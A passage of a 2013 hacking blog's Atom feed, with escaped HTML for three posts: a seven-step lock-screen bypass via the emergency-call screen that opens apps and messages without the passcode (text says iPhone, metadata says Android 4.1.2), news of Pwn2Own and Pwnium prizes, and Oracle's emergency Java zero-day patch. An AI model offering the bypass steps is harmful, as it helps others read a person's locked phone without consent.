&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;b style="background-color: white; color: #333333; line-height: 19px;"&gt;You can by-pass iPhone, iPad or iPod's security by following the steps given below:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b style="background-color: white; color: #333333; line-height: 19px;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;1. Make sure your device is locked.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;2. Activate the screen.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;3. Enter "Emergency Call".&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;4. Tap on the "ICE" button found on the bottom left.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;5. Press and hold the home button for a few seconds and then release it.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;6. The phone's home screen will be displayed.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;7. While the home screen is visible click on any app or widget and it will launch without the password.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;b&gt;&lt;u&gt;Disclaimer: &lt;/u&gt;&lt;/b&gt;&lt;i&gt;We request our readers to attempt the above hack at their own risk and for their own knowledge.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;b&gt;About the Author:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/iRwgmihwgeQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2987343850050445575/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-dodge-android-412-passcode-lock.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2987343850050445575?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2987343850050445575?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/iRwgmihwgeQ/how-to-dodge-android-412-passcode-lock.html" title="How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s72-c/Android-4.1-Jelly-Bean-Logo.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-dodge-android-412-passcode-lock.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QERns-eip7ImA9WhBRFks.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8040287862778617892</id><published>2013-03-07T07:15:00.001-08:00</published><updated>2013-03-07T07:15:07.552-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-07T07:15:07.552-08:00</app:edited><title>The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s1600/hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s640/hacking.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Well, well well! It seems like our own favourite ethical hacker, &lt;a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"&gt;&lt;b&gt;Rafay Baloch&lt;/b&gt;&lt;/a&gt;, is about to meet the clan &amp;nbsp;with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)&lt;br /&gt;
&lt;br /&gt;
Security researchers and ethical hackers are massing up in Vancouver at the CanSecWest conference this time of the year. The crowd is going to be equipped and ready to hunt down every vulnerability possible in Chrome, Internet, Explorer and Java (&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/facebooks-security-breeched-java-zero.html" target="_blank"&gt;good riddance since Java has attacked over and over again since 2013 began&lt;/a&gt;&lt;/b&gt;). And in doing so, they will be able to bag generous cash prizes.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The rules are simple:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
1. Vulnerability has to be previously unknown.&lt;br /&gt;
2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion&lt;br /&gt;
3. A full sandbox (if present) escape is required to win.&lt;/blockquote&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://dvlabs.tippingpoint.com/Pwn2OwnContestRules.html" rel="nofollow" target="_blank"&gt;Rules and Regulations&lt;/a&gt;&lt;/b&gt; from Pwn2Own can be found on their link.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The list of targets and the cash prizes to be won are:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: -webkit-auto;"&gt;
&lt;li&gt;Web Browser&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Microsoft Internet Explorer, either:&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or&lt;/li&gt;
&lt;li&gt;IE 9 on Windows 7:&amp;nbsp;&amp;nbsp;$75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;Mozilla Firefox on Windows 7:&amp;nbsp;&amp;nbsp;$60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Apple Safari on OS X Mountain Lion:&amp;nbsp;&amp;nbsp;$65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;Web Browser Plug-ins using Internet Explorer 9 on Windows 7&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
On the other hand, Google is arranging its own competition with the name of &lt;b&gt;Pwnium 3&lt;/b&gt;. Pwnium 3 focuses on finding vulnerabilities in Chrome OS and is offering a more-than-generous $3.14159 million is reward. This particular competition will be based on Samsung S5 550 Chromebook running the latest version of Chrome OS. You will need to successfully exploit the browser or system of the device logged in as a guest or a user or "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.&lt;br /&gt;
&lt;br /&gt;
Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.&lt;br /&gt;
&lt;br /&gt;
Our own bounty hunter and ethical hacker Rafay Baloch has done so many a times and has been awarded with &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2012/12/paypal-pays-me-total-bounty-of-10000.html" target="_blank"&gt;prize money from PayPal&lt;/a&gt;&lt;/b&gt;, job offers from big-shot companies and cell phones from Nokia. A proud people we are!&lt;br /&gt;
&lt;br /&gt;
Rafay Baloch and his team members (including I) have made it our mission to spread awareness regarding &lt;b&gt;Ethical Hacking &lt;/b&gt;and its advantages. Believe us people, its always better to do the right thing and get paid, then do the wrong one and get caught.&lt;br /&gt;
&lt;br /&gt;
Let the hunting begin!&lt;br /&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/vOjnppjEYCE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8040287862778617892/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/the-rise-of-ethical-hackers-let-bounty.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8040287862778617892?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8040287862778617892?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/vOjnppjEYCE/the-rise-of-ethical-hackers-let-bounty.html" title="The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s72-c/hacking.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/the-rise-of-ethical-hackers-let-bounty.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UAQngzeip7ImA9WhBRFk0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7891281434166141308</id><published>2013-03-06T12:20:00.002-08:00</published><updated>2013-03-06T12:20:43.682-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-06T12:20:43.682-08:00</app:edited><title>Java Zero-Day Vulnerabilities Fixed By Oracle</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s1600/target-java.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s400/target-java.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;We recently &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank"&gt;reported two Java zero-day vulnerabilities&lt;/a&gt; &lt;/b&gt;that were spotted in the wild by &lt;b&gt;FireEye&lt;/b&gt; now identified as the CVE-2013-1493 and CVE-2013-0809. One of these (CVE-2103-1493) was exploited by hackers to install McRat, an executable file, onto the user's machine and was therefore found to be more critical than the other.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update. But active exploitation of the above stated vulnerabilities has driven the company to roll out an &lt;b&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" rel="nofollow" target="_blank"&gt;Emergency update&lt;/a&gt;&lt;/b&gt;.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="color: black;"&gt;The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013).&amp;nbsp;&amp;nbsp;However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" style="color: black;"&gt;&lt;span style="color: black;"&gt;Security Alert&lt;/span&gt;&lt;/a&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;span style="font-family: inherit;"&gt;Previously, we suggested our users to uninstall Java if they didn't wanna be preyed upon via the McRat executable file but Oracle has been kind enough to provide us with a more suitable option to install the new version of Java or autoupdate it.&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="color: black;"&gt;Desktop users should also be aware that Oracle has recently switched&amp;nbsp;&lt;/span&gt;&lt;a href="http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html" style="color: black;"&gt;&lt;span style="color: black;"&gt;Java security settings to “high”&lt;/span&gt;&lt;/a&gt;&lt;span style="color: black;"&gt;&amp;nbsp;by default.&amp;nbsp;&amp;nbsp;This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed.&amp;nbsp;&amp;nbsp;As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet.&amp;nbsp;&amp;nbsp;In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;We would request our readers to update their versions of Java as soon as possible to refrain from being attacked. As they say, 'Prevention is better than cure'!&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/-iOmkK2t1WI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7891281434166141308/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerabilities-fixed-by.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7891281434166141308?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7891281434166141308?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/-iOmkK2t1WI/java-zero-day-vulnerabilities-fixed-by.html" title="Java Zero-Day Vulnerabilities Fixed By Oracle" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s72-c/target-java.png" height="72" width="72" 